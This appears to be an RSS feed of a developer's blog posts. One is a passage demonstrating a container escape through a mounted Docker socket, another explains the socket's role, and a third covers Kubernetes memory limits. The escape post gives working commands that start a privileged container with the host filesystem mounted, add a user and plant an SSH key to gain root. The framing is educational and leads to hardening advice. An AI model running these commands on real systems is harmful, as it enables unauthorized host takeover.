&amp;gt;       &lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;Privileged&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;: true,
&amp;gt;       &lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;NetworkMode&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;: &lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;host&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;,
&amp;gt;       &lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;Binds&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;: [&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;/:/host&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;, &lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;/dev:/dev&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;]
&amp;gt;     }
&amp;gt; }"&lt;/span&gt; | nc &lt;span class="nb"&gt;local&lt;/span&gt;:/var/run/docker.sock
HTTP/1.1 201 Created
Api-Version: 1.47
Content-Type: application/json
Docker-Experimental: &lt;span class="nb"&gt;false
&lt;/span&gt;Ostype: linux
Server: Docker/27.3.1 &lt;span class="o"&gt;(&lt;/span&gt;linux&lt;span class="o"&gt;)&lt;/span&gt;
Date: Sat, 28 Sep 2024 15:18:51 GMT
Content-Length: 88

&lt;span class="o"&gt;{&lt;/span&gt;&lt;span class="s2"&gt;"Id"&lt;/span&gt;:&lt;span class="s2"&gt;"0f9e8ac0c044a6e885dbb41dfeec772097ef223dc97664dcc777a5b4da581791"&lt;/span&gt;,&lt;span class="s2"&gt;"Warnings"&lt;/span&gt;:[]&lt;span class="o"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;To break down what happens here: first, the length of the request body is calculated, so that the &lt;code&gt;Content-Length&lt;/code&gt; header can tell the API how many bytes of JSON follow. You could also do this manually in a prior step, but letting &lt;code&gt;wc&lt;/code&gt; do the work is easier. Then we simply print the request and pipe it into &lt;code&gt;nc&lt;/code&gt;.&lt;/p&gt;
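&lt;p&gt;Because the JSON appears twice in the command above, the two copies have to stay in sync, and the length should be taken from exactly the bytes that end up in the body (one copy sits in single quotes and the other in double quotes, so the escaped quotes are not treated the same way). A minimal sketch of an alternative keeps the body in a single variable; &lt;code&gt;build_request&lt;/code&gt; and the placeholder body are hypothetical and only serve as an illustration, they are not from the original session.&lt;/p&gt;

```shell
#!/bin/sh
# Hypothetical helper (not from the original post): prints a raw HTTP/1.1
# POST request for the given API path and JSON body.
build_request() {
  path=$1
  body=$2
  # Count the bytes of exactly the string that is sent as the body.
  len=$(printf '%s' "$body" | wc -c | tr -d ' ')
  printf 'POST %s HTTP/1.1\r\n' "$path"
  printf 'Host: localhost\r\n'
  printf 'Content-Type: application/json\r\n'
  printf 'Content-Length: %s\r\n' "$len"
  printf 'Connection: close\r\n\r\n'
  printf '%s' "$body"
}

# Placeholder body; a real request would carry the container configuration.
body='{"Image": "example"}'
build_request /containers/create "$body"
```

&lt;p&gt;The output could then be piped into &lt;code&gt;nc local:/var/run/docker.sock&lt;/code&gt; in the same way as the original command.&lt;/p&gt;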

&lt;p&gt;We simply reuse the container image that Traefik runs, as it's already on the system, so this would also work in an air-gapped environment without pulling additional images. The container runs in privileged mode with the host's root filesystem mounted at &lt;code&gt;/host&lt;/code&gt;, as well as &lt;code&gt;/dev&lt;/code&gt;. &lt;code&gt;nsenter&lt;/code&gt; then enters the host's mount namespace (via &lt;code&gt;/host/proc/1/ns/mnt&lt;/code&gt;) and executes commands from there, which is why privileged mode is necessary here.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;~ &lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="s2"&gt;"POST /containers/0f9e8ac0c044a6e885dbb41dfeec772097ef223dc97664dcc777a5b4da581791/start HTTP/1.1&lt;/span&gt;&lt;span class="se"&gt;\r\n&lt;/span&gt;&lt;span class="s2"&gt;Host: localhost:2375&lt;/span&gt;&lt;span class="se"&gt;\r\n&lt;/span&gt;&lt;span class="s2"&gt;Content-Type: application/json&lt;/span&gt;&lt;span class="se"&gt;\r\n&lt;/span&gt;&lt;span class="s2"&gt;Connection: close&lt;/span&gt;&lt;span class="se"&gt;\r\n\r\n&lt;/span&gt;&lt;span class="s2"&gt;{}"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nb"&gt;sleep &lt;/span&gt;1&lt;span class="o"&gt;)&lt;/span&gt; | nc &lt;span class="nb"&gt;local&lt;/span&gt;:/var/run/docker.sock
HTTP/1.1 204 No Content
Api-Version: 1.47
Docker-Experimental: &lt;span class="nb"&gt;false
&lt;/span&gt;Ostype: linux
Server: Docker/27.3.1 &lt;span class="o"&gt;(&lt;/span&gt;linux&lt;span class="o"&gt;)&lt;/span&gt;
Date: Sat, 28 Sep 2024 15:19:24 GMT
Connection: close
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The second request simply starts the container. &lt;code&gt;sleep 1&lt;/code&gt; keeps the input of &lt;code&gt;nc&lt;/code&gt; open for a moment, allowing enough time for the request to complete. Once the container runs, it creates a simple user on the host as proof that the access works.&lt;/p&gt;

&lt;p&gt;The full API reference, including a list of all possible requests, is available in &lt;a href="https://docs.docker.com/reference/api/engine/version/v1.47/" rel="noopener noreferrer"&gt;Docker's documentation&lt;/a&gt;.&lt;/p&gt;
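&lt;p&gt;Copying the container ID into the start request by hand works, but it can also be pulled out of the create response. A minimal sketch, assuming the response body has the simple shape shown in this post and that BusyBox &lt;code&gt;sed&lt;/code&gt; is available in the container (an assumption, since it is not part of the &lt;code&gt;/usr/bin&lt;/code&gt; listing); &lt;code&gt;extract_id&lt;/code&gt; is a hypothetical helper name.&lt;/p&gt;

```shell
#!/bin/sh
# Hypothetical helper (not from the original post): reads a create response
# on stdin and prints the value of the "Id" field.
extract_id() {
  # Matches "Id":"..." with a hex value; good enough for this response
  # shape, not a general JSON parser.
  sed -n 's/.*"Id":"\([0-9a-f]*\)".*/\1/p'
}

# Sample body copied from the create response shown in this post.
response='{"Id":"0f9e8ac0c044a6e885dbb41dfeec772097ef223dc97664dcc777a5b4da581791","Warnings":[]}'

id=$(printf '%s\n' "$response" | extract_id)
# Request line for the follow-up start request.
echo "POST /containers/$id/start HTTP/1.1"
```

&lt;p&gt;Since &lt;code&gt;sed -n&lt;/code&gt; only prints the matching line, the helper could also be fed the complete &lt;code&gt;nc&lt;/code&gt; output including the response headers.&lt;/p&gt;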

&lt;p&gt;To demonstrate that our access is successful, let’s check the &lt;code&gt;/etc/passwd&lt;/code&gt; file on the host:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;david@debian:~&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;cat&lt;/span&gt; /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
hacked:x:1002:1002::/home/hacked:/bin/sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;As you can see, we’ve successfully created a new user named &lt;code&gt;hacked&lt;/code&gt;. From this point, we can escalate our access further. For instance, using the &lt;code&gt;curl&lt;/code&gt; binary from earlier, we could add an SSH public key to allow SSH access as root:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;~ &lt;span class="nv"&gt;$ &lt;/span&gt;curl &lt;span class="nt"&gt;-s&lt;/span&gt; &lt;span class="nt"&gt;-X&lt;/span&gt; POST &lt;span class="nt"&gt;--unix-socket&lt;/span&gt; /var/run/docker.sock &lt;span class="se"&gt;\&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;   &lt;span class="nt"&gt;-H&lt;/span&gt; &lt;span class="s2"&gt;"Content-Type: application/json"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;   &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="s1"&gt;'{
&amp;gt;     "Image": "traefik@sha256:6215528042906b25f23fcf51cc5bdda29e078c6e84c237d4f59c00370cb68440",
&amp;gt;     "Cmd": ["sh", "-c", "mkdir -p /host/root/.ssh; umask 0266; echo ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPdqdYmQgtmYArjAtFz00y69k1rUAeS6CvjAj2LWeOf6 &amp;gt;&amp;gt; /host/root/.ssh/authorized_keys"],
&amp;gt;     "HostConfig": {
&amp;gt;       "Privileged": true,
&amp;gt;       "NetworkMode": "host",
&amp;gt;       "Binds": ["/:/host"]
&amp;gt;     }
&amp;gt;   }'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;   http://localhost/containers/create
&lt;span class="o"&gt;{&lt;/span&gt;&lt;span class="s2"&gt;"Id"&lt;/span&gt;:&lt;span class="s2"&gt;"1309d783fc5b66125c61151aa6ef93d235d5e4e07b9bffaaf98389f2441c3d16"&lt;/span&gt;,&lt;span class="s2"&gt;"Warnings"&lt;/span&gt;:[]&lt;span class="o"&gt;}&lt;/span&gt;
~ &lt;span class="nv"&gt;$ &lt;/span&gt;curl &lt;span class="nt"&gt;-X&lt;/span&gt; POST &lt;span class="nt"&gt;-H&lt;/span&gt; &lt;span class="s2"&gt;"Content-Type: application/json"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;   &lt;span class="nt"&gt;--unix-socket&lt;/span&gt; /var/run/docker.sock &lt;span class="se"&gt;\&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;   http://localhost/containers/1309d783fc5b66125c61151aa6ef93d235d5e4e07b9bffaaf98389f2441c3d16/start
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And just like that, we’ve cracked the door wide open! You can now log in as root without needing a password:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;❯ ssh root@192.168.122.155 &lt;span class="nt"&gt;-i&lt;/span&gt; ./traefik_key
Linux debian 6.1.0-25-amd64 &lt;span class="c"&gt;#1 SMP PREEMPT_DYNAMIC Debian 6.1.106-3 (2024-08-26) x86_64&lt;/span&gt;

The programs included with the Debian GNU/Linux system are free software&lt;span class="p"&gt;;&lt;/span&gt;
the exact distribution terms &lt;span class="k"&gt;for &lt;/span&gt;each program are described &lt;span class="k"&gt;in &lt;/span&gt;the
individual files &lt;span class="k"&gt;in&lt;/span&gt; /usr/share/doc/&lt;span class="k"&gt;*&lt;/span&gt;/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Sep 27 18:00:01 2024 from 192.168.122.1    
root@debian:~# &lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-l&lt;/span&gt; ./.ssh/authorized_keys 
&lt;span class="nt"&gt;-r--------&lt;/span&gt; 1 root root 162 Sep 28 10:22 ./.ssh/authorized_keys
root@debian:~# &lt;span class="nb"&gt;cat&lt;/span&gt; ./.ssh/authorized_keys 
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPdqdYmQgtmYArjAtFz00y69k1rUAeS6CvjAj2LWeOf6
root@debian:~# &lt;span class="nb"&gt;whoami
&lt;/span&gt;root
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  &lt;code&gt;hardening:x:100:107::/nonexistent:/usr/sbin/nologin&lt;/code&gt;
&lt;/h2&gt;

&lt;p&gt;This clearly illustrates that even with hardening measures in place, it’s all too easy to exploit a system when a container has access to a mounted Docker socket.&lt;/p&gt;

&lt;p&gt;So, how can you truly secure your system? Stay tuned for my next post, where we’ll dive into the strategies you can implement to protect your systems from these potential pitfalls!&lt;/p&gt;

</description>
      <category>docker</category>
      <category>containers</category>
      <category>cybersecurity</category>
      <category>traefik</category>
    </item>
    <item>
      <title>Opening Pandora's Container - How Exposing the Docker Socket Paves the Way to Host Control (Part 1)</title>
      <dc:creator>David Gries</dc:creator>
      <pubDate>Sun, 22 Sep 2024 18:20:30 +0000</pubDate>
      <link>https://forem.com/dgries/opening-pandoras-container-how-exposing-the-docker-socket-paves-the-way-to-host-control-part-1-1nm4</link>
      <guid>https://forem.com/dgries/opening-pandoras-container-how-exposing-the-docker-socket-paves-the-way-to-host-control-part-1-1nm4</guid>
      <description>&lt;p&gt;In this three-part series, we'll explore some significant risks when working with Docker. The first part focuses on the Docker socket's role, the second will illustrate a real-world scenario of how attackers can compromise the host system, and the final post will provide hardening measures to mitigate these risks.&lt;/p&gt;

&lt;h2&gt;
  
  
  Role of the Docker Socket
&lt;/h2&gt;

&lt;p&gt;If you've ever used Docker, you're likely familiar with its command-line interface (CLI). In simple setups, the CLI acts as the primary tool for interacting with the local Docker daemon - creating, starting, and stopping containers, etc. In more complex configurations, the CLI can also execute commands against remote targets. But how does it communicate with the daemon?&lt;/p&gt;

&lt;p&gt;Docker utilizes a &lt;a href="https://docs.docker.com/reference/api/engine/version/v1.47/" rel="noopener noreferrer"&gt;REST API&lt;/a&gt; for this interaction. By default, this API is not exposed over a TCP socket as you might expect; instead, it uses a Unix Domain Socket. (For a deep dive into inter-process communication with domain sockets, stay tuned for a future post.)&lt;/p&gt;

&lt;p&gt;Let's take a look at the socket file on a default Debian installation:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;admin@proxy:~&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-la&lt;/span&gt; /var/run/docker.sock 
srw-rw---- 1 root docker 0 Sep 20 13:37 /var/run/docker.sock
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;As you can see, the socket is readable and writable by the &lt;code&gt;root&lt;/code&gt; user and by the &lt;code&gt;docker&lt;/code&gt; group. This means that any member of that group has full access to this endpoint and, through it, to the API.&lt;/p&gt;

&lt;p&gt;For example, to get information about the installed engine without using the CLI you can query the socket using &lt;code&gt;curl&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;root@proxy:~# curl &lt;span class="nt"&gt;--silent&lt;/span&gt; &lt;span class="nt"&gt;--unix-socket&lt;/span&gt; /var/run/docker.sock &lt;span class="s2"&gt;"http://localhost/version"&lt;/span&gt; | python3 &lt;span class="nt"&gt;-m&lt;/span&gt; json.tool
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"Platform"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"Name"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"Docker Engine - Community"&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"Components"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
            &lt;/span&gt;&lt;span class="nl"&gt;"Name"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"Engine"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
            &lt;/span&gt;&lt;span class="nl"&gt;"Version"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"27.3.1"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
            &lt;/span&gt;&lt;span class="nl"&gt;"Details"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="err"&gt;...&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;As the &lt;code&gt;docker&lt;/code&gt; CLI is just a tool to interact with the backend, access to the socket provides the same level of (or even more) control over the system as using the CLI does.&lt;/p&gt;
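&lt;p&gt;To make that concrete, here is a minimal Python sketch of the same &lt;code&gt;/version&lt;/code&gt; query, using only the standard library. &lt;code&gt;UnixHTTPConnection&lt;/code&gt; and &lt;code&gt;engine_get&lt;/code&gt; are hypothetical helper names of my own, not part of any Docker SDK, and the sketch assumes the socket lives at &lt;code&gt;/var/run/docker.sock&lt;/code&gt; and that the calling user may open it.&lt;/p&gt;

```python
import http.client
import json
import socket


class UnixHTTPConnection(http.client.HTTPConnection):
    """HTTP connection that talks to a Unix domain socket instead of TCP.

    Hypothetical helper for illustration; not part of any Docker SDK.
    """

    def __init__(self, socket_path, timeout=5.0):
        # The host name is only used for the Host header; the API ignores it.
        super().__init__("localhost", timeout=timeout)
        self.socket_path = socket_path

    def connect(self):
        # Replace the default TCP connect with a connect to the socket file.
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        sock.settimeout(self.timeout)
        sock.connect(self.socket_path)
        self.sock = sock


def engine_get(path, socket_path="/var/run/docker.sock"):
    """Send a GET request to the Engine API and return (status, parsed JSON)."""
    conn = UnixHTTPConnection(socket_path)
    try:
        conn.request("GET", path)
        response = conn.getresponse()
        return response.status, json.loads(response.read())
    finally:
        conn.close()
```

&lt;p&gt;Calling &lt;code&gt;engine_get("/version")&lt;/code&gt; should return the same JSON document as the &lt;code&gt;curl&lt;/code&gt; call above. No Docker binary is involved, which is the point: whoever can open the socket can speak to the API.&lt;/p&gt;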

&lt;h2&gt;
  
  
  Reasons for Exposing the Docker Socket
&lt;/h2&gt;

&lt;p&gt;You may wonder why anyone would expose the Docker socket when there are clearly risks involved. Besides accessing remote Docker daemons (which you can actually expose over a TCP socket), popular use cases are applications that need control of the daemon to manage other containers, such as &lt;a href="https://docs.portainer.io/" rel="noopener noreferrer"&gt;Portainer&lt;/a&gt;, and tools that need information about containers for auto-discovery purposes, such as Traefik. &lt;a href="https://traefik.io/traefik/" rel="noopener noreferrer"&gt;The official Traefik documentation&lt;/a&gt; even includes a mounted Docker socket in its deployment example:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;services&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;reverse-proxy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;traefik:v3.1&lt;/span&gt;
    &lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;--api.insecure=true --providers.docker&lt;/span&gt;
    &lt;span class="na"&gt;ports&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;80:80"&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;8080:8080"&lt;/span&gt;
    &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="c1"&gt;# Socket mounted into container running as 'root'&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;/var/run/docker.sock:/var/run/docker.sock&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Wrapping Up
&lt;/h2&gt;

&lt;p&gt;I've highlighted Traefik because it's a widely used reverse proxy that is frequently exposed directly to the public internet. This means that a vulnerability allowing remote code execution could grant attackers full access not only to the Traefik container, but also to the entire host system, if you don't take the necessary security measures.&lt;/p&gt;

&lt;p&gt;In the upcoming parts, I'll provide a straightforward example demonstrating how an attacker can gain control of the Docker daemon and the host system from within a container. Additionally, I'll share strategies for hardening your systems to limit the impact of these kinds of threats. Stay tuned!&lt;/p&gt;

</description>
      <category>containers</category>
      <category>docker</category>
      <category>security</category>
      <category>linux</category>
    </item>
    <item>
      <title>Escaping the OOM Killer</title>
      <dc:creator>David Gries</dc:creator>
      <pubDate>Sun, 04 Feb 2024 20:11:27 +0000</pubDate>
      <link>https://forem.com/dgries/escaping-the-oom-killer-1ic0</link>
      <guid>https://forem.com/dgries/escaping-the-oom-killer-1ic0</guid>
      <description>&lt;p&gt;Ever wondered why certain Pods face the Kubernetes OOM killer despite ample available resources? Or perhaps encountered applications attempting to exceed configured memory limits, seemingly functioning smoothly on a low-memory VM?&lt;/p&gt;

&lt;h2&gt;
  
  
  Resource Limits in Kubernetes
&lt;/h2&gt;

&lt;p&gt;Containerizing applications has solidified its position as the go-to standard for modern infrastructure. Whether operating in a virtual environment or a bare-metal cluster, understanding the ins and outs of effective resource management is crucial.&lt;/p&gt;

&lt;p&gt;In contrast to CPU limits, which cause a Pod's processes to wait if the CPU time slice limit is reached, reaching a memory limit can be destructive, as it causes a process to be killed by the underlying system's out-of-memory (OOM) killer. This shows up as a process exiting with code &lt;code&gt;137&lt;/code&gt;, that is, 128 plus 9, the signal number of &lt;code&gt;SIGKILL&lt;/code&gt;. Since &lt;code&gt;SIGKILL&lt;/code&gt; cannot be caught or handled, the process isn't shut down gracefully, which has to be considered during development.&lt;/p&gt;
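&lt;p&gt;The arithmetic behind that exit code can be sketched in a few lines of Python. The function name &lt;code&gt;describe_exit_code&lt;/code&gt; is hypothetical, and the sketch assumes the common shell convention that an exit code above 128 means "terminated by signal (code minus 128)".&lt;/p&gt;

```python
import signal


def describe_exit_code(code):
    """Explain a shell-style exit code; 129 to 255 encode a fatal signal."""
    if code in range(129, 256):
        signum = code - 128
        try:
            name = signal.Signals(signum).name
        except ValueError:
            # Not every number in that range maps to a named signal.
            name = "unknown signal"
        return f"killed by signal {signum} ({name})"
    return f"exited with status {code}"
```

&lt;p&gt;On Linux, &lt;code&gt;describe_exit_code(137)&lt;/code&gt; reports signal 9, &lt;code&gt;SIGKILL&lt;/code&gt;. The exit code alone doesn't prove the OOM killer was involved, since anything can send &lt;code&gt;SIGKILL&lt;/code&gt;, so it's worth cross-checking the container's termination reason as well.&lt;/p&gt;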

&lt;h3&gt;
  
  
  Problem 1: Cgroup Awareness
&lt;/h3&gt;

&lt;p&gt;Compared to containerless environments, Kubernetes' reliance on cgroups for constraining system resources reveals some subtle challenges that may not be immediately apparent.&lt;/p&gt;

&lt;p&gt;Let's dive into the highlighted issue. Consider the following scenario executed within a Pod with a memory limit set to 4GiB:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="nn"&gt;...&lt;/span&gt;
&lt;span class="na"&gt;resources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;limits&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;cpu&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;1"&lt;/span&gt;
    &lt;span class="na"&gt;memory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;4Gi&lt;/span&gt;
  &lt;span class="na"&gt;requests&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;cpu&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;50m&lt;/span&gt;
    &lt;span class="na"&gt;memory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;64Mi&lt;/span&gt;
&lt;span class="nn"&gt;...&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When inspecting &lt;code&gt;/proc/meminfo&lt;/code&gt;, the output reveals varying available resources:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;bash-5.1&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;cat&lt;/span&gt; /proc/meminfo
MemTotal:        8124016 kB
MemFree:          346844 kB
MemAvailable:    3358232 kB
Buffers:          999768 kB
Cached:          1690344 kB
...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This discrepancy arises because not all content in &lt;code&gt;/proc&lt;/code&gt; is namespace-aware. The metrics shown are actually those of the Node the Pod is scheduled on. Tools like &lt;code&gt;free&lt;/code&gt;, which pre-date cgroups, read this file to collect memory metrics.&lt;/p&gt;

&lt;p&gt;So, what's the solution? While there is no direct, namespace-aware replacement for these metrics, there are ways to obtain similar values from within the container. A straightforward approach is to examine the files under &lt;code&gt;/sys/fs/cgroup/memory/&lt;/code&gt;. In the example above, this yields:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;bash-5.1&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;cat&lt;/span&gt; /sys/fs/cgroup/memory/memory.limit_in_bytes
4294967296
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This value precisely matches the configured 4GiB limit. It's vital to consider that when developing applications meant to run in a containerized environment.&lt;/p&gt;
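&lt;p&gt;An application can do the same lookup at startup. The following is a minimal sketch under a few assumptions: &lt;code&gt;read_memory_limit&lt;/code&gt; is a hypothetical helper name, the first path is the cgroup v1 file shown above, and the second path, &lt;code&gt;/sys/fs/cgroup/memory.max&lt;/code&gt;, is my addition for hosts running cgroup v2, where the limit lives in a differently named file.&lt;/p&gt;

```python
from pathlib import Path

# Paths relative to the filesystem root. The v1 path is the one used above;
# the v2 path is an assumption added for hosts with the unified hierarchy.
CANDIDATES = (
    "sys/fs/cgroup/memory/memory.limit_in_bytes",  # cgroup v1
    "sys/fs/cgroup/memory.max",                    # cgroup v2
)


def read_memory_limit(root="/"):
    """Return the cgroup memory limit in bytes, or None if none is found."""
    for candidate in CANDIDATES:
        path = Path(root) / candidate
        if path.is_file():
            raw = path.read_text().strip()
            if raw == "max":
                # cgroup v2 writes the literal string "max" for "no limit".
                return None
            return int(raw)
    return None
```

&lt;p&gt;Inside the Pod from the example, &lt;code&gt;read_memory_limit()&lt;/code&gt; would return &lt;code&gt;4294967296&lt;/code&gt;. Note that cgroup v1 reports an unlimited container as a very large number rather than a special value, so a caller may want to treat anything above the Node's physical memory as "no limit".&lt;/p&gt;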

&lt;h3&gt;
  
  
  Problem 2: Page Cache
&lt;/h3&gt;

&lt;p&gt;Another non-obvious issue involves Linux's page cache, as it contributes to the &lt;code&gt;memory.available&lt;/code&gt; metric. cAdvisor includes the page cache in the calculated used memory, creating unnecessary memory pressure on the Kubelet. This is a problem because the page cache should count as evictable memory: in scenarios where multiple applications rely heavily on the cache, the Node experiences heightened memory pressure, leading to the eviction of Pods.&lt;/p&gt;

&lt;p&gt;The issue can be easily mitigated by aligning memory limits with requests. This strategy guarantees sufficient memory availability for all Pods scheduled on the Node. However, it remains more of a workaround than a resolution, as the underlying problem persists: the Kubelet does not evict caches; instead, it evicts the entire Pod.&lt;/p&gt;

&lt;p&gt;Node-pressure eviction is especially bad because configurations like &lt;code&gt;PodDisruptionBudget&lt;/code&gt; and &lt;code&gt;terminationGracePeriodSeconds&lt;/code&gt; are not considered in this scenario!&lt;/p&gt;

